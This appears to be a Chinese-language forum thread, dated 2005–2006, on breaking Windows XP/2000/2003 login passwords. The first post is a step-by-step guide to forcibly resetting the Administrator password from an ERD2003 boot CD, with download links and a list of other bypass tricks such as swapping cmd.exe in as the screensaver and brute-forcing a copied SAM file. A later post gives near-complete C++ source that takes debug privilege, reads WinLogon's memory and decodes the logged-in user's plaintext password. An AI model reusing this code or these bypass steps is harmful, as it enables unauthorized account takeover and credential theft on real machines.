2005-12-29, 04:02 PM | #1 |
管理版主
|
教學 - 最強破解 XP,2000,2003 登入密碼的方法
最強破解 XP,2000,2003 登入密碼的方法!(破解 超級管理員 密碼)
資料來源: http://www.rus.net.tw/ http://hs.rus.net.tw/ 經常見到有人遺忘了系統的管理員密碼來求助的,而網上針對此類的答案可謂五花八門,但經實踐發現其中絕大多數都是沒有用的,有些以訛傳訛的方法(例如在winxp系統下刪除sam檔等等)還會造成系統的徹底崩潰。 相比之下,利用 ERD2003 強行修改系統管理員密碼的方法簡單、易於操作,且對 2000/xp/2003 系統均有效。下面就具體介紹一下這個軟體的用法。 1. 當然是下載 ERD2003,解壓後,將其印象檔燒成光碟。 2. 光碟啟動,進入介面 3. 進入“系統”後,ERD2003會針對系統的網路等硬體設備進行一些設置,總之遇到要你選擇時一概選 yes 即可 4. 在網卡的配置時,系統提示說沒有經過 xp 的認證,不管它,一概選 yes 5. 接下來 ERD2003 會在你的硬碟媟j索所有已安裝的系統,再讓你選擇要修改的系統,這塈睊嚝 win2003 進行修改。按確定! 6. 正式進入 ERD2003 桌面了 7. 接下來是最關鍵的一步:按開始-修改密碼(或英文 start—administrative tools—locksmith),進入強行修改密碼的介面,隨後彈出的對話方塊會讓你選擇要修改密碼的用戶名(一般是選擇超級管理員 Administrator),選擇後即可強行修改密碼而不用輸入原始密碼,然後點擊 NEXT 8. 完成了,點擊 finish 之後就重啟吧,然後試試你修改的密碼,是不是進去了?原來 xp/2003 貌似嚴密的密碼保護也不過如此而已啊,一張小小的 erd2003 光碟就全破解了…… PS:網上其他一些傳說中破解 2000/xp/2003 密碼的方法如下: 1. 刪除 sam 檔——這種方法對 win2000 有效,對 xp 和 2003 不但無效,還會導致系統鎖死而徹底無法使用。 2. 用 winpe 啟動進控制臺,然後用 dos 命令手動增添用戶——除非原來管理員密碼就沒有設置,否則無效。 3. 將螢幕保護改名,將 cmd.exe 改名為 logon.scr (當然要掛在別的機器上改了),開機後等待 10 分鐘進入螢幕保護,實際上就進入了 dos 命令行介面,可以用 net 命令加用戶——已證明在 sp1、sp2、2003 中,這樣進入 dos 後的許可權根本不是管理員,因此也無法添加用戶。 4. 硬碟掛到別的機器上,copy 出 sam 文件,用 lc4 暴力解密——理論上是可以的,但如果密碼比較複雜的話,解密時間會 bt 的長。 5. 用 Windows Key 軟碟啟動系統,可直接修改管理員密碼——可是,我在網上根本找不到任何這個軟體的註冊碼或者註冊機,那樣是根本無法真正使用這個軟體的。 6. 2004年第14期的《大眾軟體》上介紹了一個新的螢幕保護程式破解法,但是根據我的試驗也是無法真正破解密碼的 「ERD2003」LiveCD下載點:(*2005/10/3 更新) http://rapidshare.de/files/5812782/W...part1.rar.html http://rapidshare.de/files/5813301/W...part2.rar.html http://rapidshare.de/files/5813313/W...part3.rar.html 三個檔案都下載回來後放同一個資料夾,再用WinRAR解壓縮即可 (From 密技偷偷報 http://totalpost.pcuser.com.tw/2AT124.htm) 論壇相關帖: http://www.slime2.com.tw/forums/show...hlight=ERD2003 http://www.slime2.com.tw/forums/show...hlight=ERD2003 http://www.slime2.com.tw/forums/show...hlight=ERD2003 http://www.slime2.com.tw/forums/show...hlight=ERD2003 http://www.slime2.com.tw/forums/show...hlight=ERD2003 |
送花文章: 1999,
|
2006-04-28, 07:50 PM | #7 (permalink) | |
註冊會員
|
引用:
|
|
送花文章: 18,
|
2006-09-23, 01:56 PM | #8 (permalink) |
榮譽會員
|
教你如何獲取windows2000當前用戶的密碼
本文所用的代碼原創作者已不知.是ccrun的一個朋友磨刀老頭提供給的,在此對作者表示感謝.經ccrun(老妖)在Win2k下試驗成功. // 獲取WinNT/Win2k當前用戶名和密碼,呼叫以下函數即可: // bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd) //--------------------------------------------------------------------------- typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; }UNICODE_STRING, *PUNICODE_STRING; typedef struct _QUERY_SYSTEM_INFORMATION { DWORD GrantedAccess; DWORD PID; WORD HandleType; WORD HandleId; DWORD Handle; }QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION; typedef struct _PROCESS_INFO_HEADER { DWORD Count; DWORD Unk04; DWORD Unk08; }PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER; typedef struct _PROCESS_INFO { DWORD LoadAddress; DWORD Size; DWORD Unk08; DWORD Enumerator; DWORD Unk10; char Name [0x108]; }PROCESS_INFO, *PPROCESS_INFO; typedef struct _ENCODED_PASSWORD_INFO { DWORD HashByte; DWORD Unk04; DWORD Unk08; DWORD Unk0C; FILETIME LoggedOn; DWORD Unk18; DWORD Unk1C; DWORD Unk20; DWORD Unk24; DWORD Unk28; UNICODE_STRING EncodedPassword; }ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO; typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD); typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD); typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID); typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID); typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING); // Private Prototypes BOOL IsWinNT(void); BOOL IsWin2K(void); BOOL AddDebugPrivilege(void); DWORD FindWinLogon(void); BOOL LocatePasswordPageWinNT(DWORD, PDWORD); BOOL LocatePasswordPageWin2K(DWORD, PDWORD); void ReturnWinNTPwd(String &, String &, String &); void ReturnWin2kPwd(String &, String &, String &); bool GetPassword(String &, String &, String &); // Global Variables PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation; PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer; PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation; PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer; PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString; DWORD dwPwdLen = 0; PVOID pvRealPwd = NULL; PVOID pvPwd = NULL; DWORD dwHashByte = 0; wchar_t wszUserName[0x400]; wchar_t wszUserDomain[0x400]; //--------------------------------------------------------------------------- bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd) { if(!IsWinNT() && !IsWin2K()) { // 只適合於2000或者xp return false; } // Add debug privilege to PasswordReminder - // this is needed for the search for Winlogon. if(!AddDebugPrivilege()) { // 不能夠新增debug特權 return false; } // debug特權已經成功加入到本程式 HINSTANCE hNtDll = LoadLibrary("NTDLL.DLL"); pfnNtQuerySystemInformation = (PFNNTQUERYSYSTEMINFORMATION) GetProcAddress(hNtDll,"NtQuerySystemInformation"); pfnRtlCreateQueryDebugBuffer = (PFNRTLCREATEQUERYDEBUGBUFFER) GetProcAddress(hNtDll,"RtlCreateQueryDebugBuffer"); pfnRtlQueryProcessDebugInformation =(PFNRTLQUERYPROCESSDEBUGINFORMATION) GetProcAddress(hNtDll,"RtlQueryProcessDebugInformation"); pfnRtlDestroyQueryDebugBuffer = (PFNRTLDESTROYQUERYDEBUGBUFFER) GetProcAddress(hNtDll,"RtlDestroyQueryDebugBuffer"); pfnRtlRunDecodeUnicodeString =(PFNTRTLRUNDECODEUNICODESTRING) GetProcAddress(hNtDll,"RtlRunDecodeUnicodeString"); // Locate WinLogon's PID - need debug privilege and admin rights. DWORD dwWinLogonPID = FindWinLogon (); if(!dwWinLogonPID) { // 找不到工作行程WinLogon 或者正在使用 NWGINA.DLL // 導致不能在記憶體中找到密碼 FreeLibrary(hNtDll); return false; } // Format("主工作行程WinLogon的id是 %d (0x%8.8x).\n", // ARRAYOFCONST(((int)dwWinLogonPID, (int)dwWinLogonPID)))); // Set values to check memory block against. memset(wszUserName, 0, sizeof (wszUserName)); memset(wszUserDomain, 0, sizeof (wszUserDomain)); GetEnvironmentVariableW(L"USERNAME",wszUserName,0x400); GetEnvironmentVariableW(L"USERDOMAIN", wszUserDomain, 0x400); // Locate the block of memory containing // the password in WinLogon's memory space. BOOL bFoundPasswordPage; //bFoundPasswordPage = FALSE; if(IsWin2K()) bFoundPasswordPage = LocatePasswordPageWin2K(dwWinLogonPID, &dwPwdLen); else bFoundPasswordPage = LocatePasswordPageWinNT(dwWinLogonPID, &dwPwdLen); if(bFoundPasswordPage) { if(dwPwdLen == 0) { // Format("登入訊息為: 域名:%S/密碼:%S.\n", // ARRAYOFCONST((wszUserDomain, wszUserName)))); // 密碼長度為空,系統沒有密碼 } else { // Format("找到了密碼,長度為%d\n", ARRAYOFCONST(((int)dwPwdLen)))); // Decode the password string. if(IsWin2K()) ReturnWin2kPwd(strCurrDomain, strCurrUser, strCurrPwd); else ReturnWinNTPwd(strCurrDomain, strCurrUser, strCurrPwd); } } else { FreeLibrary(hNtDll); return false; }// 沒有在記憶體中間找到密碼 return true; } //--------------------------------------------------------------------------- BOOL IsWinNT(void) { OSVERSIONINFO OSVersionInfo; OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); if(GetVersionEx(&OSVersionInfo)) return (OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT); else return (FALSE); } //--------------------------------------------------------------------------- BOOL IsWin2K(void) { OSVERSIONINFO OSVersionInfo; OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); if (GetVersionEx(&OSVersionInfo)) return ((OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT) && (OSVersionInfo.dwMajorVersion == 5)); else return (FALSE); } //--------------------------------------------------------------------------- BOOL AddDebugPrivilege(void) { HANDLE Token; TOKEN_PRIVILEGES TokenPrivileges, PreviousState; DWORD ReturnLength = 0; if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &Token)) if(LookupPrivilegeValue(NULL, "SeDebugPrivilege", &TokenPrivileges.Privileges[0].Luid)) { TokenPrivileges.PrivilegeCount = 1; TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; return (AdjustTokenPrivileges(Token, FALSE, &TokenPrivileges, sizeof (TOKEN_PRIVILEGES), &PreviousState, &ReturnLength)); } return (FALSE); } //--------------------------------------------------------------------------- // 本文是ccrun(老妖)的一個朋友提供的代碼.有問題或建議請致信:info@ccrun.com // 歡迎光臨C++ Builder 研究 http://www.ccrun.com //--------------------------------------------------------------------------- // Note that the following code eliminates the need // for PSAPI.DLL as part of the executable. DWORD FindWinLogon(void) { #define INITIAL_ALLOCATION 0x100 DWORD dwRc = 0; DWORD dwSizeNeeded = 0; PVOID pvInfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, INITIAL_ALLOCATION); // Find how much memory is required. pfnNtQuerySystemInformation(0x10, pvInfo, INITIAL_ALLOCATION, &dwSizeNeeded); HeapFree(GetProcessHeap(), 0, pvInfo); // Now, allocate the proper amount of memory. pvInfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwSizeNeeded); DWORD dwSizeWritten = dwSizeNeeded; if(pfnNtQuerySystemInformation(0x10, pvInfo, dwSizeNeeded, &dwSizeWritten)) { HeapFree(GetProcessHeap(), 0, pvInfo); return (0); } DWORD dwNumHandles = dwSizeWritten / sizeof (QUERY_SYSTEM_INFORMATION); if(dwNumHandles == 0) { HeapFree(GetProcessHeap(), 0, pvInfo); return (0); } PQUERY_SYSTEM_INFORMATION QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION) pvInfo; try { for(DWORD i=1; i<=dwNumHandles; i++) { // "5" is the value of a kernel object type process. if (QuerySystemInformationP->HandleType == 5) { PVOID pvDebugBuffer = pfnRtlCreateQueryDebugBuffer(0, 0); if(pfnRtlQueryProcessDebugInformation (QuerySystemInformationP->PID, 1, pvDebugBuffer) == 0) { PPROCESS_INFO_HEADER pihProcessInfoHeader = (PPROCESS_INFO_HEADER)((DWORD)pvDebugBuffer + 0x60); DWORD dwCount = pihProcessInfoHeader->Count; PPROCESS_INFO piProcessInfo = (PPROCESS_INFO) ((DWORD)pihProcessInfoHeader + sizeof (PROCESS_INFO_HEADER)); // Form1->Memo1->Lines->Add(piProcessInfo->Name); AnsiString strName = piProcessInfo->Name; // if(strstr((char *)UpCase(*piProcessInfo->Name), "WINLOGON") != 0) if(strName.UpperCase().Pos("WINLOGON") != 0) { DWORD dwTemp = (DWORD)piProcessInfo; for (DWORD j=0; j<dwCount; j++) { dwTemp += sizeof (PROCESS_INFO); piProcessInfo = (PPROCESS_INFO)dwTemp; strName = piProcessInfo->Name; if(strName.UpperCase().Pos("NWGINA") !=0 ) return (0); if(strName.UpperCase().Pos("MSGINA") !=0 ) dwRc =QuerySystemInformationP->PID; } if(pvDebugBuffer) pfnRtlDestroyQueryDebugBuffer(pvDebugBuffer); HeapFree(GetProcessHeap(), 0, pvInfo); return (dwRc); } } if (pvDebugBuffer) pfnRtlDestroyQueryDebugBuffer(pvDebugBuffer); } DWORD dwTemp = (DWORD)QuerySystemInformationP; dwTemp += sizeof(QUERY_SYSTEM_INFORMATION); QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION)dwTemp; } } catch(...) {} HeapFree(GetProcessHeap(), 0, pvInfo); return (dwRc); } //--------------------------------------------------------------------------- BOOL LocatePasswordPageWinNT(DWORD dwWinLogonPID, PDWORD pdwPwdLen) { #define USER_DOMAIN_OFFSET_WINNT 0x200 #define USER_PASSWORD_OFFSET_WINNT 0x400 BOOL bRc = FALSE; HANDLE hWinLogonHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwWinLogonPID); if(!hWinLogonHandle) return (bRc); *pdwPwdLen = 0; SYSTEM_INFO siSystemInfo; GetSystemInfo(&siSystemInfo); DWORD dwPEB = 0x7ffdf000; DWORD dwBytesCopied = 0; PVOID pvEBP = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, siSystemInfo.dwPageSize); if(!ReadProcessMemory(hWinLogonHandle, (PVOID)dwPEB, pvEBP, siSystemInfo.dwPageSize, &dwBytesCopied)) { CloseHandle(hWinLogonHandle); return (bRc); } // Grab the value of the 2nd DWORD in the TEB. PDWORD pdwWinLogonHeap = (PDWORD)((DWORD)pvEBP + (6 * sizeof (DWORD))); MEMORY_BASIC_INFORMATION mbiMemoryBasicInfor; if(VirtualQueryEx(hWinLogonHandle, (PVOID) *pdwWinLogonHeap, &mbiMemoryBasicInfor, sizeof(MEMORY_BASIC_INFORMATION))) if(((mbiMemoryBasicInfor.State & MEM_COMMIT) == MEM_COMMIT) && ((mbiMemoryBasicInfor.Protect & PAGE_GUARD) == 0)) { PVOID pvWinLogonMem = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, mbiMemoryBasicInfor.RegionSize); if(ReadProcessMemory(hWinLogonHandle, (PVOID)*pdwWinLogonHeap, pvWinLogonMem, mbiMemoryBasicInfor.RegionSize, &dwBytesCopied)) { DWORD i = (DWORD)pvWinLogonMem; DWORD dwUserNamePos = 0; // The order in memory is wszUserName followed by the wszUserDomain. do { if((wcscmp(wszUserName, (wchar_t *)i) == 0) && (wcscmp(wszUserDomain, (wchar_t *) (i + USER_DOMAIN_OFFSET_WINNT)) == 0)) { dwUserNamePos = i; break; } i += 2; }while(i < (DWORD)pvWinLogonMem + mbiMemoryBasicInfor.RegionSize); if(dwUserNamePos) { PENCODED_PASSWORD_INFO pepiEncodedPwdInfo = (PENCODED_PASSWORD_INFO)((DWORD)dwUserNamePos + USER_PASSWORD_OFFSET_WINNT); FILETIME ftLocalFileTime; SYSTEMTIME stSystemTime; if(FileTimeToLocalFileTime(&pepiEncodedPwdInfo->LoggedOn, &ftLocalFileTime)) if(FileTimeToSystemTime(&ftLocalFileTime, &stSystemTime)) {} // Format("你的登入時間為: %d/%d/%d %d:%d:%d\n", // ARRAYOFCONST((stSystemTime.wMonth, stSystemTime.wDay, // stSystemTime.wYear, stSystemTime.wHour, // stSystemTime.wMinute, stSystemTime.wSecond)))); *pdwPwdLen = (pepiEncodedPwdInfo->EncodedPassword.Length & 0x00ff) / sizeof (wchar_t); dwHashByte = (pepiEncodedPwdInfo->EncodedPassword.Length & 0xff00) >> 8; pvRealPwd = (PVOID)(*pdwWinLogonHeap + (dwUserNamePos - (DWORD)pvWinLogonMem) + USER_PASSWORD_OFFSET_WINNT + 0x34); pvPwd = (PVOID)((PBYTE)(dwUserNamePos + USER_PASSWORD_OFFSET_WINNT + 0x34)); bRc = TRUE; } } } HeapFree(GetProcessHeap(), 0, pvEBP); CloseHandle(hWinLogonHandle); return (bRc); } //--------------------------------------------------------------------------- BOOL LocatePasswordPageWin2K(DWORD dwWinLogonPID, PDWORD pdwPwdLen) { #define USER_DOMAIN_OFFSET_WIN2K 0x400 #define USER_PASSWORD_OFFSET_WIN2K 0x800 HANDLE hWinLogonHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwWinLogonPID); if(hWinLogonHandle == 0) return (FALSE); *pdwPwdLen = 0; SYSTEM_INFO siSystemInfo; GetSystemInfo(&siSystemInfo); DWORD i = (DWORD)siSystemInfo.lpMinimumApplicationAddress; DWORD dwMaxMemory = (DWORD) siSystemInfo.lpMaximumApplicationAddress; DWORD dwIncrement = siSystemInfo.dwPageSize; MEMORY_BASIC_INFORMATION mbiMemoryBasicInfor; while(i < dwMaxMemory) { if(VirtualQueryEx(hWinLogonHandle, (PVOID)i, &mbiMemoryBasicInfor, sizeof (MEMORY_BASIC_INFORMATION))) { dwIncrement = mbiMemoryBasicInfor.RegionSize; if (((mbiMemoryBasicInfor.State & MEM_COMMIT) == MEM_COMMIT) && ((mbiMemoryBasicInfor.Protect & PAGE_GUARD) == 0)) { PVOID pvRealStartingAddress = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, mbiMemoryBasicInfor.RegionSize); DWORD dwBytesCopied = 0; if(ReadProcessMemory(hWinLogonHandle, (PVOID)i, pvRealStartingAddress, mbiMemoryBasicInfor.RegionSize, &dwBytesCopied)) { if((wcscmp((wchar_t *)pvRealStartingAddress, wszUserName) == 0) && (wcscmp((wchar_t *)((DWORD)pvRealStartingAddress + USER_DOMAIN_OFFSET_WIN2K), wszUserDomain) == 0)) { pvRealPwd = (PVOID)(i + USER_PASSWORD_OFFSET_WIN2K); pvPwd = (PVOID)((DWORD)pvRealStartingAddress + USER_PASSWORD_OFFSET_WIN2K); // Calculate the length of encoded unicode string. PBYTE pbTemp = (PBYTE)pvPwd; DWORD dwLoc = (DWORD)pbTemp; DWORD dwLen = 0; if((*pbTemp == 0) && (*(PBYTE)((DWORD)pbTemp + 1) == 0)) {} else do { dwLen++; dwLoc += 2; pbTemp = (PBYTE) dwLoc; }while(*pbTemp != 0); *pdwPwdLen = dwLen; CloseHandle(hWinLogonHandle); return (TRUE); } } HeapFree(GetProcessHeap(), 0, pvRealStartingAddress); } } else dwIncrement = siSystemInfo.dwPageSize; // Move to next memory block. i += dwIncrement; } CloseHandle(hWinLogonHandle); return (FALSE); } //--------------------------------------------------------------------------- void ReturnWinNTPwd(String &strCurrDomain, String &strCurrUser, String &strCurrPwd) { UNICODE_STRING usEncodedString; usEncodedString.Length = (WORD)dwPwdLen * sizeof(wchar_t); usEncodedString.MaximumLength = ((WORD)dwPwdLen * sizeof (wchar_t)) + sizeof(wchar_t); usEncodedString.Buffer = (PWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, usEncodedString.MaximumLength); CopyMemory(usEncodedString.Buffer, pvPwd, dwPwdLen * sizeof(wchar_t)); // Finally - decode the password. // Note that only one call is required since the hash-byte // was part of the orginally encoded string. pfnRtlRunDecodeUnicodeString((BYTE)dwHashByte, &usEncodedString); strCurrDomain = String(wszUserDomain); strCurrUser = String(wszUserName); strCurrPwd = AnsiString(usEncodedString.Buffer); // Format("你的登入訊息是 域名:%S 用戶名:%S 密碼:%S\n", // ARRAYOFCONST((wszUserDomain, wszUserName, usEncodedString.Buffer)))); // Format("The hash byte is: 0x%2.2x.\n", ARRAYOFCONST(((int)dwHashByte)))); HeapFree(GetProcessHeap(), 0, usEncodedString.Buffer); } //--------------------------------------------------------------------------- void ReturnWin2kPwd(String &strCurrDomain, String &strCurrUser, String &strCurrPwd) { // DWORD dwHash = 0; UNICODE_STRING usEncodedString; usEncodedString.Length = (USHORT)dwPwdLen * sizeof(wchar_t); usEncodedString.MaximumLength = ((USHORT)dwPwdLen * sizeof(wchar_t)) + sizeof(wchar_t); usEncodedString.Buffer = (PWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, usEncodedString.MaximumLength); // This is a brute force technique since the hash-byte // is not stored as part of the encoded string - :>(. for(DWORD i=0; i<=0xff; i++) { CopyMemory(usEncodedString.Buffer, pvPwd, dwPwdLen * sizeof (wchar_t)); // Finally - try to decode the password. pfnRtlRunDecodeUnicodeString((BYTE)i, &usEncodedString); // Check for a viewable password. PBYTE pbTemp = (PBYTE)usEncodedString.Buffer; BOOL bViewable = TRUE; DWORD j, k; for(j=0; (j<dwPwdLen) && bViewable; j++) { if((*pbTemp) && (*(PBYTE)(DWORD(pbTemp) + 1) == 0)) { if(*pbTemp < 0x20) bViewable = FALSE; if(*pbTemp > 0x7e) bViewable = FALSE; } else bViewable = FALSE; k = DWORD(pbTemp); k += 2; pbTemp = (PBYTE)k; } if(bViewable) { strCurrDomain = String(wszUserDomain); strCurrUser = String(wszUserName); strCurrPwd = String(usEncodedString.Buffer); // Format("你的登入訊息為: 域名:%S 用戶名:%S 密碼:%S\n", // ARRAYOFCONST((wszUserDomain, wszUserName, usEncodedString.Buffer)))); // Format("The hash byte is: 0x%2.2x.\n", ARRAYOFCONST(((int)i)))); } } HeapFree(GetProcessHeap(), 0, usEncodedString.Buffer); } //--------------------------------------------------------------------------- // 呼叫舉例 void __fastcall TForm1::Button1Click(TObject *Sender) { String strCurrDomain, strCurrUser, strCurrPwd; GetPassword(strCurrDomain, strCurrUser, strCurrPwd); Memo1->Lines->Add(strCurrDomain); Memo1->Lines->Add(strCurrUser); Memo1->Lines->Add(strCurrPwd); |
__________________ |
|
送花文章: 3,
|